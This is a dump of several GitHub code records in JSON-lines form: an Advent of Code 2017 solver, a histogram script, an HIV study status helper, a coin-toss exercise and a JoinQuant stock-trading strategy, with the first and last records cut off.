run(self, instructions, other_program):\n async def snd(x):\n self.snd_count += 1\n other_program.rcv_queue.put_nowait(arg_value(x))\n async def set(x, y):\n self.registers[x] = arg_value(y)\n async def add(x, y):\n self.registers[x] += arg_value(y)\n async def mul(x, y):\n self.registers[x] *= arg_value(y)\n async def mod(x, y):\n self.registers[x] %= arg_value(y)\n async def rcv(x):\n self.rcv_waiting = True\n if other_program.is_blocking and self.is_blocking:\n other_program.rcv_queue.put_nowait(None)\n raise Deadlock()\n value = await self.rcv_queue.get()\n if value is None:\n raise Deadlock()\n self.registers[x] = value\n self.rcv_waiting = False\n async def jgz(x, y):\n return arg_value(y) if arg_value(x) > 0 else None\n def arg_value(x):\n return self.registers[x] if x.isalpha() else int(x)\n\n pc = 0\n while pc >= 0 and pc < len(instructions):\n cmd, args = instructions[pc]\n operation = locals()[cmd]\n try:\n jump = await operation(*args)\n except Deadlock:\n break\n if jump is not None:\n pc += jump\n else:\n pc += 1\n other_program.rcv_queue.put_nowait(None)\n\ndef parse_instructions(instructions_input):\n def parse_line(line):\n cmd, *args = line.split(' ')\n return (cmd, args)\n return [parse_line(l) for l in instructions_input.strip().splitlines()]\n\nwith open('aoc18.txt', 'r') as f:\n instructions_input = f.read()\ninstructions = parse_instructions(instructions_input)\nregisters = collections.defaultdict(lambda: 0)\nrun(registers, instructions)\nprint(f'Part 1: Recovered frequency value {registers[\"rcv\"]}')\n\n\ncpu0 = DuetCPU(0)\ncpu1 = DuetCPU(1)\nasyncio.get_event_loop().run_until_complete(asyncio.gather(\n cpu0.run(instructions, cpu1),\n cpu1.run(instructions, cpu0)\n))\nprint(f'Part 2: Program 0/1 sent {cpu0.snd_count}/{cpu1.snd_count} values.')\n","repo_name":"dexman/AdventOfCode","sub_path":"2017/aoc18.py","file_name":"aoc18.py","file_ext":"py","file_size_in_byte":8760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11061566822","text":"'''\nConverts time-sampled data into distribution format\n'''\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfilename = \"PPSSer12\"\n\ncontents = open(filename+\".txt\", mode='r')\ncontentsTxt = contents.readlines()\ncontents.close()\n\nser_T = [0]*len(contentsTxt)\npps_T = [0]*len(contentsTxt)\n\nj = 0\nfor i in range(len(contentsTxt)):\n\tline = contentsTxt[i]\n\tif (',' in line):\n\t\tcommaLoc = line.index(',')\n\t\tser_T[j] = int(line[:commaLoc])\n\t\tpps_T[j] = int(line[commaLoc+1:])\n\t\tj += 1\n\t\t\nser_T = ser_T[:j+1]\npps_T = pps_T[:j+1]\n\nserser_dT = [0]*(len(ser_T)-1)\nppspps_dT = [0]*(len(ser_T)-1)\nserpps_dT = [0]*(len(ser_T))\no_n = 100\nserser_ndT = [0]*(len(ser_T)-o_n)\n\nfor i in range(len(ser_T)):\n\tserpps_dT[i] = ser_T[i]-pps_T[i]\nfor i in range(len(ser_T)-1):\n\tserser_dT[i] = ser_T[1+i]-ser_T[i]\n\tppspps_dT[i] = pps_T[1+i]-pps_T[i]\nfor i in range(len(serser_ndT)):\n\tserser_ndT[i] = ser_T[o_n+i]-ser_T[i]\n\t\nhistData = serpps_dT\n\n\n# apply maximum filter\n#minVal = 000\n#maxVal = 2000\n#j=0\n#while(jmaxVal):\n#\t\thistData = histData[:j]+histData[j+1:]\n#\telif (histData[j] POS.\n last_hiv_result_datetime = datetime(self.last_hiv_result_date.year,\n self.last_hiv_result_date.month,\n self.last_hiv_result_date.day)\n# self.last_hiv_result_date.hour,\n# self.last_hiv_result_date.minute,\n# self.last_hiv_result_date.second,\n# self.last_hiv_result_date.millisecond)\n if self.hiv_result == POS:\n # self.hiv_result == POS could be known POS or from Today's Hiv Result\n # of from Elisa's Hiv Result\n if self.last_hiv_result == POS:\n self._hiv_result_datetime = last_hiv_result_datetime\n else:\n # else it could be that of normal hiv_result or elisa hiv_result. The two are mutually exclusive.\n self._hiv_result_datetime = (self.todays_hiv_result_datetime or\n self.elisa_hiv_result_datetime)\n else:\n self._hiv_result_datetime = (self.elisa_hiv_result_datetime or\n self.todays_hiv_result_datetime or\n last_hiv_result_datetime) # take latest if not POS\n return self._hiv_result_datetime\n\n @property\n def new_pos(self):\n \"\"\"Returns True if combination of documents and test history show POS.\"\"\"\n if self._new_pos is None:\n previous_pos = None\n previous_pos = self.previous_value(value_if_pos=POS, value_if_not_pos=None)\n if previous_pos:\n # This takes care of previous enrollees, those now doing annual survey.\n new_pos = False\n else:\n new_pos = False\n # You have not been tested today, but you have documentation of a posetive\n # past status.\n if (not (self.todays_hiv_result == POS or self.elisa_hiv_result == POS) and\n (self.direct_hiv_pos_documentation or self.indirect_hiv_documentation)):\n pass\n # You only have today's result and possibly an undocumented verbal_hiv_result\n elif ((self.todays_hiv_result == POS or self.elisa_hiv_result == POS) and not\n (self.direct_hiv_pos_documentation or self.indirect_hiv_documentation)):\n new_pos = True\n else:\n # may have no result or just an undocumented verbal_hiv_result,\n # which is not enough information.\n new_pos = None\n self._new_pos = new_pos\n return self._new_pos\n\n @property\n def arv_documentation(self):\n \"\"\"Returns True is there is arv documentation otherwise False or None.\"\"\"\n try:\n arv_documentation = convert_to_nullboolean(self.hiv_care_adherence_instance.arv_evidence)\n except AttributeError:\n arv_documentation = None\n return arv_documentation\n\n @property\n def cd4_result_datetime(self):\n \"\"\"Returns the datetim of the CD4 result run in the household.\"\"\"\n return self.todays_cd4_result_datetime\n\n @property\n def documented_verbal_hiv_result(self):\n \"\"\"Returns an hiv result based on the confirmation of the verbal result by documentation.\"\"\"\n if not self._documented_verbal_hiv_result:\n try:\n # self._documented_verbal_hiv_result = self.hiv_result_documentation_instance.result_recorded\n self._documented_verbal_hiv_result = (POS if (self.indirect_hiv_documentation or\n self.direct_hiv_pos_documentation) else None)\n except AttributeError:\n self._documented_verbal_hiv_result = None\n return self._documented_verbal_hiv_result\n\n @property\n def documented_verbal_hiv_result_date(self):\n \"\"\"Returns an hiv result based on the confirmation of the verbal result by documentation.\"\"\"\n if not self._documented_verbal_hiv_result_date:\n try:\n self._documented_verbal_hiv_result_date = (self.hiv_result_documentation_instance.result_date if\n self.hiv_result_documentation_instance else\n self.hiv_care_adherence_instance.first_arv)\n except AttributeError:\n self._documented_verbal_hiv_result_date = None\n return self._documented_verbal_hiv_result_date\n\n @property\n def cd4_result(self):\n \"\"\"Returns the value of the CD4 run in the household.\"\"\"\n return self.todays_cd4_result\n\n @property\n def defaulter(self):\n \"\"\"Returns true if subject is an ARV defaulter.\"\"\"\n if not self._defaulter:\n try:\n if (self.hiv_care_adherence_instance.on_arv == 'No' and\n self.hiv_care_adherence_instance.arv_evidence == 'Yes'):\n self._defaulter = True\n elif (self.hiv_care_adherence_instance.on_arv == 'No' and\n self.hiv_care_adherence_instance.ever_taken_arv == 'Yes'):\n self._defaulter = True\n else:\n self._defaulter = False\n except AttributeError:\n self._defaulter = None\n return self._defaulter\n\n @property\n def direct_hiv_documentation(self):\n \"\"\"Returns True if documentation of an HIV test was seen.\"\"\"\n direct_hiv_documentation = self.previous_value(value_if_pos=True, value_if_not_pos=False)\n if not direct_hiv_documentation:\n direct_hiv_documentation = True if self.recorded_hiv_result in [POS, NEG] else False\n return direct_hiv_documentation\n\n @property\n def direct_hiv_pos_documentation(self):\n \"\"\"Returns True if documentation of a POS HIV test was seen.\"\"\"\n return True if (self.recorded_hiv_result == POS) else False\n\n @property\n def indirect_hiv_documentation(self):\n \"\"\"Returns True if there is a verbal result and hiv_testing_history.other_record\n is Yes, otherwise None (not False).\n\n hiv_testing_history.other_record or hiv_care_adherence.arv_evidence is indirect\n evidence of a previous \"POS result\" only.\"\"\"\n try:\n if self.verbal_hiv_result == POS:\n if self.hiv_testing_history_instance.other_record == 'Yes' or self.arv_documentation:\n self._indirect_hiv_documentation = True\n else:\n self._indirect_hiv_documentation = False\n except AttributeError:\n self._indirect_hiv_documentation = None\n return self._indirect_hiv_documentation\n\n @property\n def last_hiv_result(self):\n \"\"\"Returns True the last HIV result which is either the recorded\n result or a verbal result supported by direct or indirect documentation.\"\"\"\n if not self._last_hiv_result:\n last_hiv_result = None\n last_hiv_result = self.previous_value(value_if_pos=POS, value_if_not_pos=None)\n # If there is no POS from a previous visit instance result, then check the status of this\n # visit instance. It could be that after you tested them, they tested POS later elsewhere\n # and have documentation to prove it.\n if not last_hiv_result:\n last_hiv_result = self.recorded_hiv_result or self.documented_verbal_hiv_result\n self._last_hiv_result = last_hiv_result\n return self._last_hiv_result\n\n @property\n def last_hiv_result_date(self):\n if not self._last_hiv_result_date:\n last_hiv_result_date = None\n last_hiv_result_date = self.previous_value(\n # attr_if_pos=('hiv_result_datetime', 'date'),\n attr_if_pos=('hiv_result_datetime',),\n value_if_not_pos=None)\n if not last_hiv_result_date:\n last_hiv_result_date = (self.recorded_hiv_result_date or\n self.documented_verbal_hiv_result_date)\n self._last_hiv_result_date = last_hiv_result_date\n return self._last_hiv_result_date\n\n @property\n def on_art(self):\n if self._on_art is None:\n try:\n if self.hiv_care_adherence_instance.on_arv == 'Yes':\n self._on_art = True\n elif self.defaulter:\n self._on_art = True\n else:\n self._on_art = False\n except AttributeError:\n if self.new_pos:\n self._on_art = False\n self._on_art = None\n return self._on_art\n\n @property\n def recorded_hiv_result(self):\n \"\"\"Returns an hiv result based on the last documented result.\"\"\"\n if not self._recorded_hiv_result:\n # a result from a previous survey is considered record of previous POS result\n recorded_hiv_result = self.previous_value(value_if_pos=POS, value_if_not_pos=None)\n if not recorded_hiv_result:\n try:\n recorded_hiv_result = self.hiv_test_review_instance.recorded_hiv_result\n except AttributeError:\n recorded_hiv_result = None\n self._recorded_hiv_result = recorded_hiv_result\n return self._recorded_hiv_result\n\n @property\n def recorded_hiv_result_date(self):\n \"\"\"Returns an hiv result based on the last documented result.\"\"\"\n if not self._recorded_hiv_result_date:\n recorded_hiv_result_date = self.previous_value(\n # attr_if_pos=('hiv_result_datetime', 'date'),\n attr_if_pos=('hiv_result_datetime',),\n value_if_not_pos=None)\n if not recorded_hiv_result_date:\n try:\n recorded_hiv_result_date = self.hiv_test_review_instance.hiv_test_date\n except AttributeError:\n recorded_hiv_result_date = None\n self._recorded_hiv_result_date = recorded_hiv_result_date\n return self._recorded_hiv_result_date\n\n @property\n def todays_cd4_result(self):\n \"\"\"Returns the CD4 result.\"\"\"\n if not self._todays_cd4_result:\n try:\n self._todays_cd4_result = int(self.pima_instance.cd4_value)\n except AttributeError:\n self._todays_cd4_result = None\n return self._todays_cd4_result\n\n @property\n def todays_cd4_result_datetime(self):\n \"\"\"Returns the CD4 result datetime.\"\"\"\n if not self._todays_cd4_result_datetime:\n try:\n self._todays_cd4_result_datetime = self.pima_instance.cd4_datetime\n except AttributeError:\n self._todays_cd4_result_datetime = None\n return self._todays_cd4_result_datetime\n\n @property\n def todays_hiv_result(self):\n \"\"\"Returns an hiv result from today's test, if it exists.\"\"\"\n if not self._todays_hiv_result:\n try:\n self._todays_hiv_result = self.hiv_result_instance.hiv_result\n except AttributeError:\n self._todays_hiv_result = None\n return self._todays_hiv_result\n\n @property\n def todays_hiv_result_datetime(self):\n \"\"\"Returns an hiv result datetime from today's test, if it exists.\"\"\"\n if not self._todays_hiv_result_datetime:\n try:\n self._todays_hiv_result_datetime = self.hiv_result_instance.hiv_result_datetime\n except AttributeError:\n self._todays_hiv_result_datetime = None\n return self._todays_hiv_result_datetime\n\n @property\n def elisa_hiv_result(self):\n \"\"\"Returns an hiv result from the Elisa result form, if it exists.\"\"\"\n if not self._elisa_hiv_result:\n try:\n self._elisa_hiv_result = self.elisa_result_instance.hiv_result\n except AttributeError:\n self._elisa_hiv_result = None\n return self._elisa_hiv_result\n\n @property\n def elisa_hiv_result_datetime(self):\n \"\"\"Returns an hiv result datetime from Elisa result form, if it exists.\"\"\"\n if not self._elisa_hiv_result_datetime:\n try:\n self._elisa_hiv_result_datetime = self.elisa_result_instance.hiv_result_datetime\n except AttributeError:\n self._elisa_hiv_result_datetime = None\n return self._elisa_hiv_result_datetime\n\n @property\n def verbal_hiv_result(self):\n \"\"\"Returns the hiv result given verbally by the respondent from HivTestingHistory.\"\"\"\n if not self._verbal_hiv_result:\n try:\n self._verbal_hiv_result = (self.hiv_testing_history_instance.verbal_hiv_result\n if self.hiv_testing_history_instance.verbal_hiv_result in [\n POS, 'NEG', 'IND'] else None)\n except AttributeError:\n self._verbal_hiv_result = None\n return self._verbal_hiv_result\n\n @property\n def vl_sample_drawn(self):\n \"\"\"Returns True if the VL was drawn.\"\"\"\n if self._vl_sample_drawn is None:\n vl_sample_drawn = self.previous_value(\n attr_if_pos=('vl_sample_drawn', ),\n value_if_not_pos=None)\n if not vl_sample_drawn:\n vl_sample_drawn = True if self.vl_requisition_instance else False\n self._vl_sample_drawn = vl_sample_drawn\n return self._vl_sample_drawn\n\n @property\n def vl_sample_drawn_datetime(self):\n \"\"\"Returns the viral load draw datetime from the SubjectRequisition for VL or None.\"\"\"\n if not self._vl_sample_drawn_datetime:\n vl_sample_drawn_datetime = self.previous_value(\n attr_if_pos=('vl_sample_drawn_datetime', ),\n value_if_not_pos=None)\n if not vl_sample_drawn_datetime:\n try:\n vl_sample_drawn_datetime = self.vl_requisition_instance.drawn_datetime\n except AttributeError:\n vl_sample_drawn_datetime = None\n self._vl_sample_drawn_datetime = vl_sample_drawn_datetime\n return self._vl_sample_drawn_datetime\n\n @property\n def hiv_care_adherence_instance(self):\n \"\"\"Returns a model instance of HivCareAdherence or None.\"\"\"\n if not self._hiv_care_adherence_instance:\n try:\n self._hiv_care_adherence_instance = self.models[self.timepoint_key].get(\n 'hiv_care_adherence').objects.get(subject_visit=self.subject_visit)\n except self.models[self.timepoint_key].get('hiv_care_adherence').DoesNotExist:\n self._hiv_care_adherence_instance = None\n return self._hiv_care_adherence_instance\n\n @property\n def hiv_result_instance(self):\n \"\"\"Returns a model instance of HivResult or None.\"\"\"\n if not self._hiv_result_instance:\n try:\n self._hiv_result_instance = self.models[self.timepoint_key].get(\n 'hiv_result').objects.get(\n subject_visit=self.subject_visit, hiv_result__in=[POS, 'NEG', 'IND', 'Declined'])\n except self.models[self.timepoint_key].get('hiv_result').DoesNotExist:\n self._hiv_result_instance = None\n return self._hiv_result_instance\n\n @property\n def elisa_result_instance(self):\n if not self._elisa_result_instance:\n try:\n self._elisa_result_instance = self.models[self.timepoint_key].get(\n 'elisa_hiv_result').objects.get(subject_visit=self.subject_visit)\n except self.models[self.timepoint_key].get('elisa_hiv_result').DoesNotExist:\n self._elisa_result_instance = None\n return self._elisa_result_instance\n\n @property\n def hiv_testing_history_instance(self):\n \"\"\"Returns a model instance of HivTestingHistory or None.\"\"\"\n if not self._hiv_testing_history_instance:\n try:\n self._hiv_testing_history_instance = self.models[self.timepoint_key].get(\n 'hiv_testing_history').objects.get(subject_visit=self.subject_visit)\n except self.models[self.timepoint_key].get('hiv_testing_history').DoesNotExist:\n self._hiv_testing_history_instance = None\n return self._hiv_testing_history_instance\n\n @property\n def hiv_result_documentation_instance(self):\n \"\"\"Returns a model instance of HivResultDocumentation or None.\"\"\"\n if not self._hiv_result_documentation_instance:\n try:\n self._hiv_result_documentation_instance = self.models[self.timepoint_key].get(\n 'hiv_result_documentation').objects.get(\n subject_visit=self.subject_visit, result_recorded__in=[POS, 'NEG', 'IND'])\n except self.models[self.timepoint_key].get('hiv_result_documentation').DoesNotExist:\n self._hiv_result_documentation_instance = None\n return self._hiv_result_documentation_instance\n\n @property\n def hiv_test_review_instance(self):\n \"\"\"Returns a model instance of HivTestReview or None.\"\"\"\n if not self._hiv_test_review_instance:\n try:\n self._hiv_test_review_instance = self.models[self.timepoint_key].get(\n 'hiv_test_review').objects.get(\n subject_visit=self.subject_visit, recorded_hiv_result__in=[POS, 'NEG', 'IND'])\n except self.models[self.timepoint_key].get('hiv_test_review').DoesNotExist:\n self._hiv_test_review_instance = None\n return self._hiv_test_review_instance\n\n @property\n def pima_instance(self):\n \"\"\"Returns a model instance of Pima or None.\"\"\"\n if not self._pima_instance:\n try:\n self._pima_instance = self.models[self.timepoint_key].get(\n 'pima').objects.get(subject_visit=self.subject_visit, cd4_value__isnull=False)\n except self.models[self.timepoint_key].get('pima').DoesNotExist:\n self._pima_instance = None\n return self._pima_instance\n\n @property\n def vl_requisition_instance(self):\n \"\"\"Returns a model instance of the SubjectRequisition for panel VL or None.\"\"\"\n if not self._vl_requisition_instance:\n try:\n self._vl_requisition_instance = self.models[self.timepoint_key].get(\n 'subject_requisition').objects.get(\n subject_visit=self.subject_visit, panel__name='Viral Load', is_drawn='Yes')\n except self.models[self.timepoint_key].get('subject_requisition').DoesNotExist:\n pass\n return self._vl_requisition_instance\n\n @property\n def rbd_sample_drawn(self):\n \"\"\"Returns True if the VL was drawn.\"\"\"\n if not self._rbd_sample_drawn:\n rbd_sample_drawn = self.previous_value(\n attr_if_pos=('rbd_sample_drawn', ),\n value_if_not_pos=None)\n if not rbd_sample_drawn:\n rbd_sample_drawn = True if self.vl_requisition_instance else False\n self._rbd_sample_drawn = rbd_sample_drawn\n return self._rbd_sample_drawn\n\n @property\n def rbd_requisition_instance(self):\n \"\"\"Returns a model instance of the SubjectRequisition for panel RBD or None.\"\"\"\n if not self._rbd_requisition_instance:\n try:\n self._rbd_requisition_instance = self.models[self.timepoint_key].get(\n 'subject_requisition').objects.get(\n subject_visit=self.subject_visit, panel__name='Research Blood Draw', is_drawn='Yes')\n except self.models[self.timepoint_key].get('subject_requisition').DoesNotExist:\n pass\n return self._rbd_requisition_instance\n","repo_name":"botswana-harvard/bcpp-v1","sub_path":"bcpp_subject/subject_status_helper.py","file_name":"subject_status_helper.py","file_ext":"py","file_size_in_byte":29246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37581165925","text":"\"\"\"Debugging Coin Toss\n\nThe following program is meant to be a simple coin toss guessing game. The\nplayer gets two guesses (it’s an easy game). However, the program has several bugs in it. Run through the program a few times to find the bugs that\nkeep the program from working correctly.\n\n\"\"\"\n\nimport random, sys\n\n\ndef coin_toss():\n options = ['heads', 'tails']\n while True:\n\n machine_select = options[random.randint(0, 1)]\n user_select = input('[H] to heads, [T] to tails, [E] to exit: ')\n print('*' * 100)\n \n if user_select.upper() == 'H':\n user_select = 'heads'\n elif user_select.upper() == 'T':\n user_select = 'tails'\n elif user_select.upper() == 'E':\n sys.exit()\n else:\n print('Put a valid command')\n continue\n\n if user_select == machine_select:\n print('You win, the coin was ' + user_select)\n break\n else:\n print('You lost, try again :(')\n continue\n\n return\n\n\n\nif __name__ == '__main__':\n\n coin_toss()\n\n\n","repo_name":"ftarantuviez/Automate-Boring-Stuff-with-Python","sub_path":"chapter10/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"893931726","text":"from kuanke.wizard import *\nfrom jqdata import *\nimport numpy as np\nimport pandas as pd\nimport talib\nimport datetime\n\n## 初始化函数,设定要操作的股票、基准等等\ndef initialize(context):\n # 设定基准\n set_benchmark('000300.XSHG')\n # 设定滑点\n set_slippage(FixedSlippage(0.02))\n # True为开启动态复权模式,使用真实价格交易\n set_option('use_real_price', True)\n # 设定成交量比例\n set_option('order_volume_ratio', 1)\n # 股票类交易手续费是:买入时佣金万分之三,卖出时佣金万分之三加千分之一印花税, 每笔交易佣金最��扣5块钱\n set_order_cost(OrderCost(open_tax=0, close_tax=0.001, open_commission=0.0003, close_commission=0.0003, min_commission=5), type='stock')\n # 个股最大持仓比重\n g.security_max_proportion = 1\n # 选股频率\n g.check_stocks_refresh_rate = 1\n # 买入频率\n g.buy_refresh_rate = 1\n # 卖出频率\n g.sell_refresh_rate = 1\n # 最大建仓数量\n g.max_hold_stocknum = 4\n\n # 选股频率计数器\n g.check_stocks_days = 0\n # 买卖交易频率计数器\n g.buy_trade_days=0\n g.sell_trade_days=0\n # 获取未卖出的股票\n g.open_sell_securities = []\n # 卖出股票的dict\n g.selled_security_list={}\n\n # 股票筛选初始化函数\n check_stocks_initialize()\n # 股票筛选排序初始化函数\n check_stocks_sort_initialize()\n # 出场初始化函数\n sell_initialize()\n # 入场初始化函数\n buy_initialize()\n # 风控初始化函数\n risk_management_initialize()\n\n # 关闭提示\n log.set_level('order', 'info')\n\n # 运行函数\n run_daily(sell_every_day,'open') #卖出未卖出成功的股票\n run_daily(risk_management, 'every_bar') #风险控制\n run_daily(check_stocks, 'open') #选股\n run_daily(trade, 'open') #交易\n run_daily(selled_security_list_count, 'after_close') #卖出股票日期计数\n\n\n## 股票筛选初始化函数\ndef check_stocks_initialize():\n # 是否过滤停盘\n g.filter_paused = True\n # 是否过滤退市\n g.filter_delisted = True\n # 是否只有ST\n g.only_st = False\n # 是否过滤ST\n g.filter_st = True\n # 股票池\n g.security_universe_index = [\"000300.XSHG\"]\n g.security_universe_user_securities = []\n # 行业列表\n g.industry_list = [\"801010\",\"801020\",\"801030\",\"801040\",\"801050\",\"801080\",\"801110\",\"801120\",\"801130\",\"801140\",\"801150\",\"801160\",\"801170\",\"801180\",\"801200\",\"801210\",\"801230\",\"801710\",\"801720\",\"801730\",\"801740\",\"801750\",\"801760\",\"801770\",\"801780\",\"801790\",\"801880\",\"801890\"]\n # 概念列表\n g.concept_list = []\n\n## 股票筛选排序初始化函数\ndef check_stocks_sort_initialize():\n # 总排序准则: desc-降序、asc-升序\n g.check_out_lists_ascending = 'desc'\n\n## 出场初始化函数\ndef sell_initialize():\n # 设定是否卖出buy_lists中的股票\n g.sell_will_buy = False\n\n # 固定出仓的数量或者百分比\n g.sell_by_amount = None\n g.sell_by_percent = None\n\n## 入场初始化函数\ndef buy_initialize():\n # 是否可重复买入\n g.filter_holded = False\n\n # 委托类型\n g.order_style_str = 'by_market_cap_percent'\n g.order_style_value = 100\n\n## 风控初始化函数\ndef risk_management_initialize():\n # 策略风控信号\n g.risk_management_signal = True\n\n # 策略当日触发风控清仓信号\n g.daily_risk_management = True\n\n # 单只最大买入股数或金额\n g.max_buy_value = None\n g.max_buy_amount = None\n\n\n## 卖出未卖出成功的股票\ndef sell_every_day(context):\n g.open_sell_securities = list(set(g.open_sell_securities))\n open_sell_securities = [s for s in context.portfolio.positions.keys() if s in g.open_sell_securities]\n if len(open_sell_securities)>0:\n for stock in open_sell_securities:\n order_target_value(stock, 0)\n g.open_sell_securities = [s for s in g.open_sell_securities if s in context.portfolio.positions.keys()]\n return\n\n## 风控\ndef risk_management(context):\n ### _风控函数筛选-开始 ###\n security_stoploss(context,0.05,g.open_sell_securities)\n portfolio_stoploss(context,0.05,g.open_sell_securities)\n index_stoploss_sicha(context,60,g.open_sell_securities, '000300.XSHG')\n ### _风控函数筛选-结束 ###\n return\n\n## 股票筛选\ndef check_stocks(context):\n if g.check_stocks_days%g.check_stocks_refresh_rate != 0:\n # 计数器加一\n g.check_stocks_days += 1\n return\n # 股票池赋值\n g.check_out_lists = get_security_universe(context, g.security_universe_index, g.security_universe_user_securities)\n # 行业过滤\n g.check_out_lists = industry_filter(context, g.check_out_lists, g.industry_list)\n # 概念过滤\n g.check_out_lists = concept_filter(context, g.check_out_lists, g.concept_list)\n # 过滤ST股票\n g.check_out_lists = st_filter(context, g.check_out_lists)\n # 过滤退市股票\n g.check_out_lists = delisted_filter(context, g.check_out_lists)\n # 财务筛选\n g.check_out_lists = financial_statements_filter(context, g.check_out_lists)\n # 行情筛选\n g.check_out_lists = situation_filter(context, g.check_out_lists)\n # 技术指标筛选\n g.check_out_lists = technical_indicators_filter(context, g.check_out_lists)\n # 形态指标筛选函数\n g.check_out_lists = pattern_recognition_filter(context, g.check_out_lists)\n # 其他筛选函数\n g.check_out_lists = other_func_filter(context, g.check_out_lists)\n\n # 排序\n input_dict = get_check_stocks_sort_input_dict()\n g.check_out_lists = check_stocks_sort(context,g.check_out_lists,input_dict,g.check_out_lists_ascending)\n\n # 计数器归一\n g.check_stocks_days = 1\n return\n\n## 交易函数\ndef trade(context):\n # 初始化买入列表\n buy_lists = []\n\n # 买入股票筛选\n if g.buy_trade_days%g.buy_refresh_rate == 0:\n # 获取 buy_lists 列表\n buy_lists = g.check_out_lists\n # 过滤ST股票\n buy_lists = st_filter(context, buy_lists)\n # 过滤停牌股票\n buy_lists = paused_filter(context, buy_lists)\n # 过滤退市股票\n buy_lists = delisted_filter(context, buy_lists)\n # 过滤涨停股票\n buy_lists = high_limit_filter(context, buy_lists)\n\n ### _入场函数筛选-开始 ###\n ### _入场函数筛选-结束 ###\n\n # 卖出操作\n if g.sell_trade_days%g.sell_refresh_rate != 0:\n # 计数器加一\n g.sell_trade_days += 1\n else:\n # 卖出股票\n sell(context, buy_lists)\n # 计数器归一\n g.sell_trade_days = 1\n\n\n # 买入操作\n if g.buy_trade_days%g.buy_refresh_rate != 0:\n # 计数器加一\n g.buy_trade_days += 1\n else:\n # 卖出股票\n buy(context, buy_lists)\n # 计数器归一\n g.buy_trade_days = 1\n\n## 卖出股票日期计数\ndef selled_security_list_count(context):\n g.daily_risk_management = True\n if len(g.selled_security_list)>0:\n for stock in g.selled_security_list.keys():\n g.selled_security_list[stock] += 1\n\n################################## 选股函数群 ##################################\n\n## 财务指标筛选函数\ndef financial_statements_filter(context, security_list):\n ### _财务指标筛选函数-开始 ###\n security_list = financial_data_filter_dayu(security_list, indicator.gross_profit_margin, 40)\n security_list = financial_data_filter_qujian(security_list, valuation.pe_ratio, (5,35))\n security_list = financial_data_filter_dayu(security_list, indicator.roe, 10)\n ### _财务指标筛选函数-结束 ###\n\n # 返回列表\n return security_list\n\n## 行情筛选函数\ndef situation_filter(context, security_list):\n ### _行情筛选函数-开始 ###\n security_list = [security for security in security_list if situation_filter_dayu_ma(security, 'close', 60)]\n ### _行情筛选函数-结束 ###\n\n # 返回列表\n return security_list\n\n## 技术指标筛选函数\ndef technical_indicators_filter(context, security_list):\n ### _技术指标筛选函数-开始 ###\n security_list = [security for security in security_list if EMA_judge_duotou(security,10,60)]\n ### _技术指标筛选函数-结束 ###\n\n # 返回列表\n return security_list\n\n## 形态指标筛选函数\ndef pattern_recognition_filter(context, security_list):\n ### _形态指标筛选函数-开始 ###\n ### _形态指标筛选函数-结束 ###\n\n # 返回列表\n return security_list\n\n## 其他方式筛选函数\ndef other_func_filter(context, security_list):\n ### _其他方式筛选函数-开始 ###\n ### _其他方式筛选函数-结束 ###\n\n # 返回列表\n return security_list\n\n# 获取选股排序的 input_dict\ndef get_check_stocks_sort_input_dict():\n input_dict = {\n indicator.roe:('desc',1),\n valuation.pe_ratio:('asc',1),\n }\n # 返回结果\n return input_dict\n\n################################## 交易函数群 ##################################\n# 交易函数 - 出场\ndef sell(context, buy_lists):\n # 获取 sell_lists 列表\n init_sl = context.portfolio.positions.keys()\n sell_lists = context.portfolio.positions.keys()\n\n # 判断是否卖出buy_lists中的股票\n if not g.sell_will_buy:\n sell_lists = [security for security in sell_lists if security not in buy_lists]\n\n ### _出场函数筛选-开始 ###\n ### _出场函数筛选-结束 ###\n\n # 卖出股票\n if len(sell_lists)>0:\n for stock in sell_lists:\n sell_by_amount_or_percent_or_none(context,stock, g.sell_by_amount, g.sell_by_percent, g.open_sell_securities)\n\n # 获取卖出的股票, 并加入到 g.selled_security_list中\n selled_security_list_dict(context,init_sl)\n\n return\n\n# 交易函数 - 入场\ndef buy(context, buy_lists):\n # 风控信号判断\n if not g.risk_management_signal:\n return\n\n # 判断当日是否触发风控清仓止损\n if not g.daily_risk_management:\n return\n # 判断是否可重复买入\n buy_lists = holded_filter(context,buy_lists)\n\n # 获取最终的 buy_lists 列表\n Num = g.max_hold_stocknum - len(context.portfolio.positions)\n buy_lists = buy_lists[:Num]\n\n # 买入股票\n if len(buy_lists)>0:\n # 分配资金\n result = order_style(context,buy_lists,g.max_hold_stocknum, g.order_style_str, g.order_style_value)\n for stock in buy_lists:\n if len(context.portfolio.positions) < g.max_hold_stocknum:\n # 获取资金\n Cash = result[stock]\n # 判断个股最大持仓比重\n value = judge_security_max_proportion(context,stock,Cash,g.security_max_proportion)\n # 判断单只最大买入股数或金额\n amount = max_buy_value_or_amount(stock,value,g.max_buy_value,g.max_buy_amount)\n # 下单\n order(stock, amount, MarketOrderStyle())\n return\n\n################################### 公用函数群 ##################################\n## 排序\ndef check_stocks_sort(context,security_list,input_dict,ascending='desc'):\n if (len(security_list) == 0) or (len(input_dict) == 0):\n return security_list\n else:\n # 生成 key 的 list\n idk = list(input_dict.keys())\n # 生成矩阵\n a = pd.DataFrame()\n for i in idk:\n b = get_sort_dataframe(security_list, i, input_dict[i])\n a = pd.concat([a,b],axis = 1)\n # 生成 score 列\n a['score'] = a.sum(1,False)\n # 根据 score 排序\n if ascending == 'asc':# 升序\n if hasattr(a, 'sort'):\n a = a.sort(['score'],ascending = True)\n else:\n a = a.sort_values(['score'],ascending = True)\n elif ascending == 'desc':# 降序\n if hasattr(a, 'sort'):\n a = a.sort(['score'],ascending = False)\n else:\n a = a.sort_values(['score'],ascending = False)\n # 返回结果\n return list(a.index)\n\n## 过滤同一标的继上次卖出N天不再买入\ndef filter_n_tradeday_not_buy(security, n=0):\n try:\n if (security in g.selled_security_list.keys()) and (g.selled_security_list[security]0:\n for stock in selled_sl:\n g.selled_security_list[stock] = 0\n\n## 过滤停牌股票\ndef paused_filter(context, security_list):\n if g.filter_paused:\n current_data = get_current_data()\n security_list = [stock for stock in security_list if not current_data[stock].paused]\n # 返回结果\n return security_list\n\n## 过滤退市股票\ndef delisted_filter(context, security_list):\n if g.filter_delisted:\n current_data = get_current_data()\n security_list = [stock for stock in security_list if not (('退' in current_data[stock].name) or ('*' in current_data[stock].name))]\n # 